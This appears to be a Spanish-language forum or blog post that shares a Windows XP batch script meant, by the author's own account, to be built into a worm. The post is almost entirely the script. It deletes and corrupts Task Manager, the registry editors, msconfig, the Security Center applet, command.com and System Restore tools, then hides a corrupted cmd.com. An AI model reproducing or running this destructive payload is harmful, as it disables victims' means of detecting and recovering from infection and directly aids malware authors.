ya publiqué anteriormente un par de codigos de batch que podían ser integrados dentro del código general de un gusano. En este post y en los próximos que publique iré ampliando los códigos que subí.
Este código en concreto se encarga de restringir la seguridad de un ordenador corriendo bajo Windows XP:
Código
@echo off del /Q /F %WINDIR%\System32\taskmgr.exe del /Q /F %WINDIR%\System32\tasklist.exe del /Q /F %WINDIR%\System32\regedt32.exe del /Q /F %WINDIR%\System32\wscui.cpl del /Q /F %WINDIR%\System32\command.com del /Q /F %WINDIR%\System32\restore\rstrui.exe del /Q /F %WINDIR%\System32\restore\srdiag.exe del /Q /F %WINDIR%\taskman.exe del /Q /F %WINDIR%\regedit.exe del /Q /F %WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe" echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe" echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe" echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe" echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe" echo %random%%random%%random%%random%>>"%WINDIR%\regedit" echo %random%%random%%random%%random%>>"%WINDIR%\regedit" echo %random%%random%%random%%random%>>"%WINDIR%\regedit" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe" echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe" echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe" echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe" echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl" echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl" echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl" echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl" echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com" attrib +s +h +r "%WINDIR%\System32\cmd.com"
Hasta otra!